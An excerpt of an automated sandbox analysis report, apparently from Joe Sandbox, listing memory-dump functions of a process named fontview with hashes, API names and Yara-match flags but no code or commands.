                                                                                                                              • Instruction Fuzzy Hash: C690022921340002F1C07159540860A00059BD1207FD6D41DA0016558CC91AD9695321
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 04AB2E80 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000C.00000002.3735975826.0000000004A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A40000, based on PE: true
                                                                                                                              • Associated: 0000000C.00000002.3735975826.0000000004B69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000C.00000002.3735975826.0000000004B6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000C.00000002.3735975826.0000000004BDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_12_2_4a40000_fontview.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: InitializeThunk
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2994545307-0
                                                                                                                              • Opcode ID: aa75ee4f69bfc0d9c9e608517a016fe225f5580e140e4fd47ec7a3a4e5f38853
                                                                                                                              • Instruction ID: ec5b4899ed5fb5a0e02201b6ff651d37cd465afbe8609e577e538f5ee7a3e10c
                                                                                                                              • Opcode Fuzzy Hash: aa75ee4f69bfc0d9c9e608517a016fe225f5580e140e4fd47ec7a3a4e5f38853
                                                                                                                              • Instruction Fuzzy Hash: 2090022160140502F14171594404616000A9BD0246FD6C02AA1025555ECA2ADA92A131
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 04AB2EE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000C.00000002.3735975826.0000000004A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A40000, based on PE: true
                                                                                                                              • Associated: 0000000C.00000002.3735975826.0000000004B69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000C.00000002.3735975826.0000000004B6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000C.00000002.3735975826.0000000004BDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_12_2_4a40000_fontview.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: InitializeThunk
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2994545307-0
                                                                                                                              • Opcode ID: 2470e7c1fa668c8f8d31a72e60b0f78a00755d8ca7ba99b2de6bdfdb50d3135a
                                                                                                                              • Instruction ID: bf20dbc49be419e60fbaa3fdb9675e031281780d57d986695554afff094b2415
                                                                                                                              • Opcode Fuzzy Hash: 2470e7c1fa668c8f8d31a72e60b0f78a00755d8ca7ba99b2de6bdfdb50d3135a
                                                                                                                              • Instruction Fuzzy Hash: 0E90026120180403F1807559480460700059BD0307F96C019A2065555E8A2EDD516135
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 04AB2FB0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000C.00000002.3735975826.0000000004A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A40000, based on PE: true
                                                                                                                              • Associated: 0000000C.00000002.3735975826.0000000004B69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000C.00000002.3735975826.0000000004B6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000C.00000002.3735975826.0000000004BDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_12_2_4a40000_fontview.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: InitializeThunk
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2994545307-0
                                                                                                                              • Opcode ID: dca20161fce250ff825b5a9842ed45680e00027b9843b66c5cd813b95bf64625
                                                                                                                              • Instruction ID: faa87f21fceabee25a87ef06ff1e880cb050a53f0b2856c101bb604721a5f567
                                                                                                                              • Opcode Fuzzy Hash: dca20161fce250ff825b5a9842ed45680e00027b9843b66c5cd813b95bf64625
                                                                                                                              • Instruction Fuzzy Hash: 93900221601400426180716988449064005BFE1216796C129A0999550D855ED9655665
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 04AB2FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000C.00000002.3735975826.0000000004A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A40000, based on PE: true
                                                                                                                              • Associated: 0000000C.00000002.3735975826.0000000004B69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000C.00000002.3735975826.0000000004B6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000C.00000002.3735975826.0000000004BDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_12_2_4a40000_fontview.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: InitializeThunk
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2994545307-0
                                                                                                                              • Opcode ID: c1028f55cffdba244899090245ba85059a876bd3933fa1bca735169b349138a9
                                                                                                                              • Instruction ID: cc97a96a12db24a166e72dd527ed2fc1bad60bfcea9bc1ca5020785af934afff
                                                                                                                              • Opcode Fuzzy Hash: c1028f55cffdba244899090245ba85059a876bd3933fa1bca735169b349138a9
                                                                                                                              • Instruction Fuzzy Hash: 84900221211C0042F24075694C14B0700059BD0307F96C11DA0155554CC91AD9615521
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 04AB2F30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000C.00000002.3735975826.0000000004A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A40000, based on PE: true
                                                                                                                              • Associated: 0000000C.00000002.3735975826.0000000004B69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000C.00000002.3735975826.0000000004B6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000C.00000002.3735975826.0000000004BDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_12_2_4a40000_fontview.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: InitializeThunk
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2994545307-0
                                                                                                                              • Opcode ID: 4a453bf6efcfb4b88204dd22a87852c09d1f0be02213aded48b6a38ec0e00a99
                                                                                                                              • Instruction ID: f6deffefdd54a22714f5d77bb6ca6c3ea92b6727731b1574c098e70af82adc1f
                                                                                                                              • Opcode Fuzzy Hash: 4a453bf6efcfb4b88204dd22a87852c09d1f0be02213aded48b6a38ec0e00a99
                                                                                                                              • Instruction Fuzzy Hash: 9F90026134140442F14071594414B060005DBE1306F96C01DE1065554D861EDD526126
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 04AB2AF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000C.00000002.3735975826.0000000004A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A40000, based on PE: true
                                                                                                                              • Associated: 0000000C.00000002.3735975826.0000000004B69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000C.00000002.3735975826.0000000004B6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000C.00000002.3735975826.0000000004BDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_12_2_4a40000_fontview.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: InitializeThunk
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2994545307-0
                                                                                                                              • Opcode ID: f3ff940fff2cd660b0dfd88f58b2aed07ee6ff0421d4fe6c49491c9377bba0ed
                                                                                                                              • Instruction ID: 3a9681ea919b522816d9935bbc0bc57b24b79b0f6d4bf83e445c346c4e3cb596
                                                                                                                              • Opcode Fuzzy Hash: f3ff940fff2cd660b0dfd88f58b2aed07ee6ff0421d4fe6c49491c9377bba0ed
                                                                                                                              • Instruction Fuzzy Hash: 70900225221400022185B559060450B0445ABD63563D6C01DF1417590CC626D9655321
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 04AB2AD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000C.00000002.3735975826.0000000004A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A40000, based on PE: true
                                                                                                                              • Associated: 0000000C.00000002.3735975826.0000000004B69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000C.00000002.3735975826.0000000004B6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000C.00000002.3735975826.0000000004BDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_12_2_4a40000_fontview.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: InitializeThunk
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2994545307-0
                                                                                                                              • Opcode ID: 6ec976d5590c723e8797194380fee1dd3b263b92471616af60d810578b8838be
                                                                                                                              • Instruction ID: 31c432244e81023ccaa9ce48c3dec0b6bc41ed70f810be65f024820decef1205
                                                                                                                              • Opcode Fuzzy Hash: 6ec976d5590c723e8797194380fee1dd3b263b92471616af60d810578b8838be
                                                                                                                              • Instruction Fuzzy Hash: 97900225211400032145B559070450700469BD5356396C029F1016550CD626D9615121
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 04AB2BA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000C.00000002.3735975826.0000000004A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A40000, based on PE: true
                                                                                                                              • Associated: 0000000C.00000002.3735975826.0000000004B69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000C.00000002.3735975826.0000000004B6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000C.00000002.3735975826.0000000004BDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_12_2_4a40000_fontview.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: InitializeThunk
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2994545307-0
                                                                                                                              • Opcode ID: 08f7f2d6e6819ba791ec4d6a324940a17c7db883c159685a3980e995bdc8d57b
                                                                                                                              • Instruction ID: 4452d861eb5ebeb0ce3be0e449061c92da5b2691d99bda311d2f65ce9a5ca1b5
                                                                                                                              • Opcode Fuzzy Hash: 08f7f2d6e6819ba791ec4d6a324940a17c7db883c159685a3980e995bdc8d57b
                                                                                                                              • Instruction Fuzzy Hash: 4990023160540802F1907159441474600059BD0306F96C019A0025654D875ADB5576A1
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 04AB2BE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000C.00000002.3735975826.0000000004A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A40000, based on PE: true
                                                                                                                              • Associated: 0000000C.00000002.3735975826.0000000004B69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000C.00000002.3735975826.0000000004B6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000C.00000002.3735975826.0000000004BDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_12_2_4a40000_fontview.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: InitializeThunk
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2994545307-0
                                                                                                                              • Opcode ID: 348daad74ae580a37320ce66b8d8192897e9e881c524cef5cc8fe8819f569ec1
                                                                                                                              • Instruction ID: 0edd1a5946e95962840440b2e32e61d3a937847640d42471b7c896fc145fe671
                                                                                                                              • Opcode Fuzzy Hash: 348daad74ae580a37320ce66b8d8192897e9e881c524cef5cc8fe8819f569ec1
                                                                                                                              • Instruction Fuzzy Hash: BA90023120544842F18071594404A4600159BD030AF96C019A0065694D962ADE55B661
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 04AB2BF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000C.00000002.3735975826.0000000004A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A40000, based on PE: true
                                                                                                                              • Associated: 0000000C.00000002.3735975826.0000000004B69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000C.00000002.3735975826.0000000004B6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000C.00000002.3735975826.0000000004BDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_12_2_4a40000_fontview.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: InitializeThunk
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2994545307-0
                                                                                                                              • Opcode ID: 49b11c0dfc26bf24c5021f5253d30c4eb0444dcd3186db63cd8b833e073522e8
                                                                                                                              • Instruction ID: db999bff6eb1012a43a0f8e5ca5b6da1547f9556ab8b38058c2d9e7733bd3c84
                                                                                                                              • Opcode Fuzzy Hash: 49b11c0dfc26bf24c5021f5253d30c4eb0444dcd3186db63cd8b833e073522e8
                                                                                                                              • Instruction Fuzzy Hash: EA90023120140802F1C07159440464A00059BD1306FD6C01DA0026654DCA1ADB5977A1
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 04AB2B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000C.00000002.3735975826.0000000004A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A40000, based on PE: true
                                                                                                                              • Associated: 0000000C.00000002.3735975826.0000000004B69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000C.00000002.3735975826.0000000004B6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000C.00000002.3735975826.0000000004BDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_12_2_4a40000_fontview.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: InitializeThunk
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2994545307-0
                                                                                                                              • Opcode ID: 5b24a3201ad0410a2e4154e3b7b733726f1d3ae5a62585cfa66426deea33503e
                                                                                                                              • Instruction ID: 4b4e4dca58dfa4ec075e6f85934f9afad4761f8c400b41dc5cb6e5c8baa25951
                                                                                                                              • Opcode Fuzzy Hash: 5b24a3201ad0410a2e4154e3b7b733726f1d3ae5a62585cfa66426deea33503e
                                                                                                                              • Instruction Fuzzy Hash: 8190026120240003614571594414616400A9BE0206B96C029E1015590DC52AD9916125
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 04AB35C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000C.00000002.3735975826.0000000004A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A40000, based on PE: true
                                                                                                                              • Associated: 0000000C.00000002.3735975826.0000000004B69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000C.00000002.3735975826.0000000004B6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000C.00000002.3735975826.0000000004BDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_12_2_4a40000_fontview.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: InitializeThunk
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2994545307-0
                                                                                                                              • Opcode ID: a8a804ac5874ddf2313f431321a0bde1341a80837b8e34073b63971118c76133
                                                                                                                              • Instruction ID: 474021499252e38453242199d3f3c309bda27ae75c4fdf430d281f4838030e4d
                                                                                                                              • Opcode Fuzzy Hash: a8a804ac5874ddf2313f431321a0bde1341a80837b8e34073b63971118c76133
                                                                                                                              • Instruction Fuzzy Hash: 9590023160550402F1407159451470610059BD0206FA6C419A0425568D879ADA5165A2
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 04AB39B0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000C.00000002.3735975826.0000000004A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A40000, based on PE: true
                                                                                                                              • Associated: 0000000C.00000002.3735975826.0000000004B69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000C.00000002.3735975826.0000000004B6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000C.00000002.3735975826.0000000004BDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_12_2_4a40000_fontview.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: InitializeThunk
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2994545307-0
                                                                                                                              • Opcode ID: 5d613e83cb0649e3dea56be14057997c6b6739face399fc762c8a8964aa2a272
                                                                                                                              • Instruction ID: 30b5bd5d46d804c4ced54472792a4446c0b35a248ef637b52f5be68476b735b9
                                                                                                                              • Opcode Fuzzy Hash: 5d613e83cb0649e3dea56be14057997c6b6739face399fc762c8a8964aa2a272
                                                                                                                              • Instruction Fuzzy Hash: B590022124545102F190715D44046164005BBE0206F96C029A0815594D855AD9556221
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 02A41ABF Relevance: .2, Instructions: 221COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000C.00000002.3728408141.0000000002A30000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A30000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_12_2_2a30000_fontview.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: ErrorMode
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2340568224-0
                                                                                                                              • Opcode ID: 306bb4ae6f18e9ed0c30f8e52c3b0369cbf79fc6d1ca87648d946907b0560e58
                                                                                                                              • Instruction ID: 426f1c784f034b4f88d780b4e4bb71f99554129441def2d5a7970c3c10edffc4
                                                                                                                              • Opcode Fuzzy Hash: 306bb4ae6f18e9ed0c30f8e52c3b0369cbf79fc6d1ca87648d946907b0560e58
                                                                                                                              • Instruction Fuzzy Hash: 797181B1D40218ABDB24DBA4DD81FEFB7BDAF84304F04455AE91DA2141EF709685CFA1
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 02A40918 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 121COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000C.00000002.3728408141.0000000002A30000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A30000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_12_2_2a30000_fontview.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: 2N-F32-85$2N-F32-85
                                                                                                                              • API String ID: 0-2434227226
                                                                                                                              • Opcode ID: 832197ac50c296536c299c8c58a1ac8c3c7ba0ef88384922bdf9f7b53cdc477d
                                                                                                                              • Instruction ID: 07909dbc1229ad8e1499889065024b224e2f02cd7bc19cb846d7a6f6f83d77a6
                                                                                                                              • Opcode Fuzzy Hash: 832197ac50c296536c299c8c58a1ac8c3c7ba0ef88384922bdf9f7b53cdc477d
                                                                                                                              • Instruction Fuzzy Hash: EB31FC35844248AAD7219F758C81BEEBF38DF92A20F18418CEB901B193DF609507D794
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 02A409C9 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 58threadwindowCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • PostThreadMessageW.USER32(2N-F32-85,00000111,00000000,00000000), ref: 02A40A4D
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000C.00000002.3728408141.0000000002A30000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A30000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_12_2_2a30000_fontview.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: MessagePostThread
                                                                                                                              • String ID: 2N-F32-85$2N-F32-85
                                                                                                                              • API String ID: 1836367815-2434227226
                                                                                                                              • Opcode ID: e1cc42a8a78512431e5bf1171017e70435a345e342ecc2a8e3c22ac8a3fc953e
                                                                                                                              • Instruction ID: 39a64c1cc13e06c5e04877dc44602f23079a83900415248dc5f9a412beccbac3
                                                                                                                              • Opcode Fuzzy Hash: e1cc42a8a78512431e5bf1171017e70435a345e342ecc2a8e3c22ac8a3fc953e
                                                                                                                              • Instruction Fuzzy Hash: 2411C471E80218B6DB21A7A48C46FEFBF7C9F45B50F048155FA04BB180DB74A6068BA5
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 02A409D0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 57threadwindowCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • PostThreadMessageW.USER32(2N-F32-85,00000111,00000000,00000000), ref: 02A40A4D
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000C.00000002.3728408141.0000000002A30000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A30000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_12_2_2a30000_fontview.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: MessagePostThread
                                                                                                                              • String ID: 2N-F32-85$2N-F32-85
                                                                                                                              • API String ID: 1836367815-2434227226
                                                                                                                              • Opcode ID: c18053ed195c731a3439170fa277cb7a7870a0a9e0d593e1a2de0246ac3ee490
                                                                                                                              • Instruction ID: 450c42c0e2e6cf35553d0828446ff14feabefc83e94bc35b6061d8264af3b240
                                                                                                                              • Opcode Fuzzy Hash: c18053ed195c731a3439170fa277cb7a7870a0a9e0d593e1a2de0246ac3ee490
                                                                                                                              • Instruction Fuzzy Hash: 1901C071D80218B6EB21A7A08C05FEFBB7C9F80B50F008055FA047B180EAB4A6068BA5
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 02A5243E Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 133COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000C.00000002.3728408141.0000000002A30000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A30000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_12_2_2a30000_fontview.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: net.dll$wininet.dll
                                                                                                                              • API String ID: 0-1269752229
                                                                                                                              • Opcode ID: 9c3bdc5c4561c1379145c3b585a312418661c3b194bf8d7f2f40ae675e581518
                                                                                                                              • Instruction ID: 6d62dc7baa237f5c9c6302364f691889449d520950a088ca30c4bb98eeccb4f2
                                                                                                                              • Opcode Fuzzy Hash: 9c3bdc5c4561c1379145c3b585a312418661c3b194bf8d7f2f40ae675e581518
                                                                                                                              • Instruction Fuzzy Hash: 2C4177B66442019BC324CF78E880BE2F7B9EF8A314F1446AEDC9C9B206DB756455CBD0
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 02A524D0 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 104sleepCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • Sleep.KERNELBASE(000007D0), ref: 02A5259B
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000C.00000002.3728408141.0000000002A30000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A30000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_12_2_2a30000_fontview.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: Sleep
                                                                                                                              • String ID: net.dll$wininet.dll
                                                                                                                              • API String ID: 3472027048-1269752229
                                                                                                                              • Opcode ID: 45fe11faa63c57a68425311a4af1dce3f7ec7095f7542f433304b4951084fd98
                                                                                                                              • Instruction ID: c5b65b016788055d3a4c66665f22c3c62c8c706dc3cdc9925fe02f4f8a8debf6
                                                                                                                              • Opcode Fuzzy Hash: 45fe11faa63c57a68425311a4af1dce3f7ec7095f7542f433304b4951084fd98
                                                                                                                              • Instruction Fuzzy Hash: 2831ADB5640704ABD724DFA4D884FABB7F9EB88704F00852EF95D9B245DB70A944CFA0
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 02A524C1 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 97sleepCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • Sleep.KERNELBASE(000007D0), ref: 02A5259B
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000C.00000002.3728408141.0000000002A30000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A30000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_12_2_2a30000_fontview.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: Sleep
                                                                                                                              • String ID: net.dll$wininet.dll
                                                                                                                              • API String ID: 3472027048-1269752229
                                                                                                                              • Opcode ID: c8bc5f941df6e521d4d81cd654f0c54857ff19ad7f8aa67a27450438ebff6f78
                                                                                                                              • Instruction ID: ccbd2b514b3e2693640ea034d20ae40e8c9f237226c5c2db8955fef9206f6446
                                                                                                                              • Opcode Fuzzy Hash: c8bc5f941df6e521d4d81cd654f0c54857ff19ad7f8aa67a27450438ebff6f78
                                                                                                                              • Instruction Fuzzy Hash: C931CFB1A40701ABD714DFA4DCC5FABBBB8EB84704F108169ED5D5B285DB706944CFA0
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 02A5246C Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 83sleepCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • Sleep.KERNELBASE(000007D0), ref: 02A5259B
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
